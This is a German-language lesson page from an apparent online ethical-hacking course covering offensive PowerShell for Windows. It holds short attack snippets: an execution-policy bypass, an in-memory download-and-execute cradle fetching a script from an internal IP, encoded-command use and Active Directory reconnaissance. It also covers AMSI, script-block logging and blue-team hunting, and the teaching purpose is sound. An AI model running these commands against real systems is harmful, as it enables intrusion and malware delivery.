0Pricing
Ethical Hacking Academy · Lektion

PowerShell für Angreifer

Offensive PowerShell

PowerShell für Angreifer ist eine kostenlose Ethical Hacking Academy-Lektion auf CoddyKit. Dies ist Lektion 4 von 4. Du kannst die komplette Lektion unten kostenlos lesen – dann übst du sie direkt im Browser mit einem integrierten Code-Editor und einem KI-Tutor rund um die Uhr. Sie ist Teil des Ethical Hacking Academy-Lernpfads, und dein Fortschritt wird über Web und CoddyKit-App synchronisiert. Der Ethical Hacking Academy-Kurs umfasst insgesamt 4 Lektionen.

Warum PowerShell

PowerShell ist in Windows integriert, eng mit dem Betriebssystem und .NET verzahnt und wird von Administratoren als vertrauenswürdig angesehen. Dadurch ist es ein beliebtes Living-off-the-Land-Tool für Angreifer – sie müssen keine Malware ablegen.

Diese Lektion behandelt Konzepte des offensiven PowerShell, die Sie verstehen müssen, um Windows anzugreifen und zu verteidigen.

Cmdlets und die Pipeline

PowerShell-Befehle sind Cmdlets in der Form Verb-Nomen. Sie reichen umfangreiche Objekte (nicht nur Text) durch die Pipeline weiter, wodurch Enumeration besonders leistungsfähig wird.

Get-Process | Where-Object { $_.CPU -gt 10 } | Select-Object Name, Id

System-Enumeration

Angreifer verwenden integrierte Cmdlets, um einen Host schnell zu untersuchen – Benutzer, Dienste, Netzwerk und installierte Patches.

Get-LocalUser
Get-Service | Where-Object Status -eq 'Running'
Get-NetTCPConnection -State Listen

Die Ausführungsrichtlinie ist keine Sicherheit

Die Ausführungsrichtlinie schränkt das Ausführen von Skriptdateien ein, stellt aber keine Sicherheitsgrenze dar. Viele einfache Schalter umgehen sie, daher sollten sich Verteidiger nicht darauf verlassen.

powershell -ExecutionPolicy Bypass -File script.ps1

Herunterladen und ausführen

Bei einer verbreiteten Technik wird eine Payload abgerufen und im Speicher ausgeführt, sodass nur wenige Spuren auf der Festplatte zurückbleiben. Deshalb sind Netzwerküberwachung und AMSI wichtig.

IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/tool.ps1')

Codierte Befehle

Der Schalter -EncodedCommand führt Base64-codiertes PowerShell aus und wird häufig verwendet, um die Absicht vor einer oberflächlichen Prüfung und einfachen Filtern zu verbergen.

Verteidiger decodieren diese Einträge aus den Protokollen, um sichtbar zu machen, was tatsächlich ausgeführt wurde.

powershell -EncodedCommand <base64-here>

Offensive Frameworks

Ausgereifte Toolkits bauen auf diesen Grundlagen auf:

  • PowerSploit / PowerView – AD-Enumeration und Post-Exploitation.
  • Empire / Covenant – Command-and-Control.
  • Nishang – offensive Skripte.

Die meisten werden inzwischen von Schutzmechanismen umfassend anhand von Signaturen erkannt.

Reconnaissance in Active Directory

In einer Domäne bildet PowerShell (PowerView oder das AD-Modul) Benutzer, Gruppen und Vertrauensbeziehungen ab – die Grundlage, um einen Pfad zu Domain Admin zu finden.

Get-ADUser -Filter * -Properties LastLogonDate
Get-ADGroupMember 'Domain Admins'

AMSI und Protokollierung

Microsoft hat speziell zum Schutz vor dem Missbrauch von PowerShell folgende Abwehrmechanismen hinzugefügt:

  • AMSI (Antimalware Scan Interface) scannt Skriptinhalte vor der Ausführung.
  • Script Block Logging protokolliert, was ausgeführt wird.
  • Constrained Language Mode schränkt gefährliche Funktionen ein.

Angreifer versuchen, AMSI zu umgehen; Verteidiger überwachen die Protokolle.

Defensive Suche

Blue Teams suchen nach schädlichem PowerShell, indem sie auf Folgendes achten:

  • Codierte oder verschleierte Befehle.
  • Netzwerkabrufe mit DownloadString / IEX.
  • Ungewöhnliche übergeordnete Prozesse (Office startet PowerShell).
  • AMSI- und Script-Block-Protokolle mit der Ereignis-ID 4104.

Verwenden Sie es verantwortungsvoll

Diese Techniken sind leistungsfähig und entsprechen direkt Vorgehensweisen bei realen Eindringversuchen. Führen Sie sie nur in Ihrem eigenen Labor oder mit einer ausdrücklichen schriftlichen Genehmigung aus.

Auch die defensive Seite zu üben – Protokolle zu lesen und AMSI-Treffer zu erkennen – ist genauso wertvoll wie die offensive Seite.

Schnelltest

Bewerten Sie die Ausführungsrichtlinie als Kontrollmaßnahme.

Zusammenfassung

Sie haben offensives PowerShell untersucht:

  • Objektbasierte Cmdlets machen Enumeration leistungsfähig und unauffällig (Living-off-the-Land).
  • Herunterladen und Ausführen, codierte Befehle sowie Frameworks wie PowerView und Empire.
  • Die Ausführungsrichtlinie ist keine Sicherheitsmaßnahme; AMSI und Script Block Logging sind die tatsächlichen Schutzmechanismen.
  • Arbeiten Sie stets verantwortungsvoll und befassen Sie sich auch mit der defensiven Seite.

Damit ist der Kurs zu den Windows-Interna abgeschlossen.

Häufig gestellte Fragen

Ist die Lektion „PowerShell für Angreifer“ kostenlos?

Ja — der vollständige Text von „PowerShell für Angreifer“ ist hier im Web kostenlos zu lesen. Um sie interaktiv zu üben (integrierter Code-Editor und 24/7 KI-Tutor) und den Rest des Ethical Hacking Academy-Kurses freizuschalten, upgrade auf CoddyKit PRO. Der Ethical Hacking Academy-Kurs umfasst insgesamt 4 Lektionen.

Was lerne ich in „PowerShell für Angreifer“?

Offensive PowerShell Du übst Ethical Hacking Academy mit praktischem Code, den du direkt im Browser ausführst, und ein 24/7 KI-Tutor beantwortet deine Fragen während du die Lektion bearbeitest.

Brauche ich Erfahrung, um Ethical Hacking Academy zu starten?

Keine Vorkenntnisse erforderlich. Ethical Hacking Academy auf CoddyKit ist für Anfänger bis fortgeschrittene Lernende strukturiert, sodass du hier starten oder von Anfang an beginnen und in deinem eigenen Tempo voranschreiten kannst. Dies ist Lektion 4 von 4.

Wie lange dauert die Lektion „PowerShell für Angreifer“?

Die meisten CoddyKit-Lektionen dauern etwa 5–10 Minuten. Jede ist kompakt und interaktiv, sodass du stetig Fortschritte machst und genau dort weitermachst, wo du aufgehört hast – im Web und in der App.

Kann ich in dieser Ethical Hacking Academy-Lektion Code schreiben und ausführen?

Ja. Jede Ethical Hacking Academy-Lektion enthält einen integrierten Code-Editor, sodass du echten Code direkt in deinem Browser schreibst und ausführst und sofort KI-Feedback erhältst — ohne lokale Einrichtung erforderlich.

Alle Lektionen in diesem Kurs

  1. Windows-Architektur
  2. Die Registry
  3. Windows-Authentifizierung
  4. PowerShell für Angreifer
← Zurück zu Ethical Hacking Academy